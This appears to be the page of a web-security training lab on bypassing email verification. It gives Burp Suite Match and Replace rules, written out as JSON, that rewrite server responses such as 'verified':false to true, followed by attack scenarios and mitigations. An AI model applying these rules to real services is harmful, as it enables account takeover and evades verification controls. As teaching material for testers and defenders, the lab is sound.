Lab 7: Email Verification Bypass - Response Manipulation Labs

Difficulty: Medium

Lab Overview

This lab demonstrates email verification bypass vulnerabilities where attackers can use Burp Suite to modify verification responses and bypass email verification requirements.

Objective: Understand how email verification bypass attacks work and how to exploit them using Burp Suite.

Email Verification System

Verify Email

Test email verification with response manipulation:

Check Verification Status

Check email verification status:

Resend Verification

Resend verification email:

Email Verification Bypass Tester

⚠️ Email Verification Bypass Warning

This lab demonstrates email verification bypass vulnerabilities:

Verification Bypass - Bypass email verification
Status Manipulation - Manipulate verification status
Code Bypass - Bypass verification codes
Resend Bypass - Bypass resend restrictions

Burp Suite Rules

Use these Burp Suite Match and Replace rules:

"verified":false → "verified":true
"email_verified":false → "email_verified":true
"verification_status":"unverified" → "verification_status":"verified"
"status":"error" → "status":"success"

Email Verification Bypass Rules

Verification Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verified\":false", "string_replace": "\"verified\":true" }

Email Verified Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"email_verified\":false", "string_replace": "\"email_verified\":true" }

Verification Status Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verification_status\":\"unverified\"", "string_replace": "\"verification_status\":\"verified\"" }

Status Success Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"error\"", "string_replace": "\"status\":\"success\"" }

Message Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"message\":\"Invalid verification code\"", "string_replace": "\"message\":\"Email verified successfully\"" }

Verification Sent Bypass

{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"verification_sent\":false", "string_replace": "\"verification_sent\":true" }

Vulnerability Details

Type: Email Verification Bypass
Severity: High
Method: Burp Suite Match and Replace
Issue: Client-side trust of verification responses

Attack Vectors

Verification Bypass: Bypass email verification
Status Manipulation: Manipulate verification status
Code Bypass: Bypass verification codes
Resend Bypass: Bypass resend restrictions

Email Verification Bypass Examples

Use these Burp Suite Match and Replace rules to exploit email verification bypass vulnerabilities:

1. Verification Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"verified\":false",
  "string_replace": "\"verified\":true"
}

// This rule bypasses email verification
// Example: "verified":false becomes "verified":true

2. Email Verified Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"email_verified\":false",
  "string_replace": "\"email_verified\":true"
}

// This rule bypasses email verification status
// Example: "email_verified":false becomes "email_verified":true

3. Verification Status Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"verification_status\":\"unverified\"",
  "string_replace": "\"verification_status\":\"verified\""
}

// This rule bypasses verification status
// Example: "verification_status":"unverified" becomes "verification_status":"verified"

4. Status Success Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"status\":\"error\"",
  "string_replace": "\"status\":\"success\""
}

// This rule bypasses status errors
// Example: "status":"error" becomes "status":"success"

5. Message Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"message\":\"Invalid verification code\"",
  "string_replace": "\"message\":\"Email verified successfully\""
}

// This rule bypasses error messages
// Example: "message":"Invalid verification code" becomes "message":"Email verified successfully"

6. Verification Sent Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"verification_sent\":false",
  "string_replace": "\"verification_sent\":true"
}

// This rule bypasses verification sent status
// Example: "verification_sent":false becomes "verification_sent":true

7. Code Validation Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"code_valid\":false",
  "string_replace": "\"code_valid\":true"
}

// This rule bypasses code validation
// Example: "code_valid":false becomes "code_valid":true

8. Email Status Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"email_status\":\"unverified\"",
  "string_replace": "\"email_status\":\"verified\""
}

// This rule bypasses email status
// Example: "email_status":"unverified" becomes "email_status":"verified"

9. Verification Code Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"code_verified\":false",
  "string_replace": "\"code_verified\":true"
}

// This rule bypasses code verification
// Example: "code_verified":false becomes "code_verified":true

10. Email Confirmation Bypass:

{
  "comment": "Response Manipulation",
  "enabled": true,
  "is_simple_match": false,
  "rule_type": "response_body",
  "string_match": "\"email_confirmed\":false",
  "string_replace": "\"email_confirmed\":true"
}

// This rule bypasses email confirmation
// Example: "email_confirmed":false becomes "email_confirmed":true

Real-World Attack Scenarios

Complete email verification bypass and unauthorized access
Account takeover and identity theft
Data manipulation and integrity issues
Compliance violations and legal issues
Business process disruption and operational impact
Resource abuse and unauthorized operations

Mitigation Strategies

Implement server-side email verification validation
Use response integrity checks and signatures
Implement proper verification controls
Use secure coding practices
Regular security testing and vulnerability assessments
Monitor for unusual verification patterns
Implement proper input validation
Use multi-factor authentication
Implement proper error handling
Educate users about security threats
Use email verification bypass detection tools
Implement proper audit trails
Use secure verification codes
Implement proper rate limiting